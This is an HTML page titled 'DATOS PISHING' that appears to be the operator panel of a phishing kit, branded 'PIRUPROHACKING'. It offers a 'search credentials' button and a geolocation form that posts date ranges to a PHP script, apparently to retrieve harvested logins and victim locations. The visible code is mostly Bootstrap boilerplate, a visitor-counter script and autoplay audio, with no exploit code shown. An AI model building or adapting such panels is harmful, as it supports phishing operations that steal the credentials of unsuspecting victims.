<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

       <div data-video="7wtfhZwyrcc" 
            data-autoplay="1"       
                    data-loop="1"        
           id="youtube-audio">
     <script src="https://www.youtube.com/iframe_api"></script>
     <script src="https://cdn.rawgit.com/labnol/files/master/yt.js"></script> 
   
	
  </div>
 <title>DATOS PISHING </title>
<link rel="SHORTCUT ICON" type="chliz" href="static/imagen/GBWEx-FW-400x400.jpg">


        <link rel="stylesheet" type="text/css" href="static/simditor/css/simditor.css" />

        <!-- Bootstrap CSS -->
        <!-- If you want to use the CDN insted of the local file, simply uncomment the line below and remove the local link -->
            <!-- <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> -->
        <link rel="stylesheet" href="static/bootstrap-4.0.0/css/bootstrap.min.css">
     


    </head>

   <style type="text/css">
body {

 background:  url("static/imagen/Anonymous-Pictures-Images-wallpaper-wp2002392.jpg");
background-repeat: no-repeat;
background-position: center;
background-attachment: fixed;
background-color: #000000;
margin-top: 5%;
margin-bottom: 5%;
margin-left: 15%;
margin-right: 15%;
font-family:"Courier New", Courier, monospace;
color: #FFFFFF;
}

</style>


</head>

<fieldset>
<div id="footer"> <font size="+2" >  </font></div>
<img  src="static/imagen/GBWEx-FW-400x400.jpg" 
WIDTH=286 HEIGHT=160
>

                       <body>
   <center>

  		 
                            <!-- More Options -->
                                 <button type="button" class="btn-sm btn-primary mb-3" data-toggle="collapse" data-target="#more-options" id="more-options-btn"><span id="show-more"></span>BUSCAR CREDENCIALES </button>
                                 <div class="collapse alert alert-secondary" id="more-options">
                       
                                       <div class="row">
  <div class="col-md-6">
    <div class="panel">
      <div class="panel-heading">

      </div>
      <div class="panel-body">
        <form action="GEODB1.PHP" id="credenciales" class="form-signin" role="form" method="post">
        <center>
						<h5 class="form-signin-heading textCenter"><font color="blue">GEOLOCALIZADOR</font></h5>
												<input type="date" name="fecha1" class="form-control" placeholder="Desde" >
						<input type="date" name="fecha2" class="form-control" placeholder="Hasta" >
					  
    
						<input type="button" class="btn-sm btn-primary mb-3" onclick="limpiarFormulario()" value="Limpiar formulario">
						
						<button class="btn-sm btn-primary mb-3" type="submit">BUSCAR</button>
						<br/>
						</center>
					</form>
            <div class="form-group">
              
      </div>

    </div>
  </div>

</div>
             </CENTER>
     <script>
  function limpiarFormulario() {
    document.getElementById("credenciales").reset();
  }
</script>                             
           
   <!--/col-->


    <!-- Optional JavaScript -->
        <!-- If you want to use th CDN and not the local jquery file to save space then uncomment the CDN script tags and remove the local script tags. -->

    <!-- JQUERY -->
        <!-- <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>-->
        <script src="static/bootstrap-4.0.0/js/jquery-3.2.1.slim.min.js"></script>

    <!-- BOOTSTRAP -->
        <!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script> -->
        <script src="static/bootstrap-4.0.0/js/bootstrap.bundle.min.js"></script>

    <!-- Ritch Text Editor Simditor JS -->
    <script src="static/simditor/js/module.js"></script>
    <script src="static/simditor/js/hotkeys.js"></script>
    <script src="static/simditor/js/uploader.js"></script>
    <script src="static/simditor/js/simditor.js"></script>

    <!-- Custom Scripts -->
    <script>
    // Required snippit to initalize simditor. It is looking for the ID of the textara as listed above
    var editor = new Simditor({
        textarea: $('#editor')
        //optional options added here
        });

    // Required snippit to initalize the tooltips in Bootstrap
    $(function () {
      $('[data-toggle="tooltip"]').tooltip()
    })

    // Toggle show more btn text
    // Not sure if this is the ideal way to do this, but it works
    var showMoreOptions = false; // Start with false, because it is hidden by default
    $('#more-options-btn').click(function(){ // On click check if var is true or false
        if(!showMoreOptions) {
            // When it expands content switch to hide
            $('#show-more').replaceWith("<span id='show-less'>Hide</span>");
            showMoreOptions = true;
        } else {
            // She collapsed switch to show
            $('#show-less').replaceWith("<span id='show-more'>Show</span>");
            showMoreOptions = false;
        }
    });

    // File Upload change
    function fileNameChange(){
        var fileName = document.getElementById("customFile").files[0].name;
        console.log("User uploaded " + fileName);
        document.getElementById("customFileText").innerHTML = fileName;
    };

    </script>
  
            </div>
        </div>
    </section>


 
             </CENTER>
 
                     <br><br><script type="text/javascript" src="http://www.usuarios-online.com/usuarios.php?v=www.e-viphostchile.tk/acta.html"></script> <a href="http://www.usuarios-online.com/en/" target="_blank"> <font color=white>Usuarios En Linea</font></a>
<br> <br><center> <font color=yellow >PIRUPROHACKING© 2012-2021 <br> </font></center>
</html>
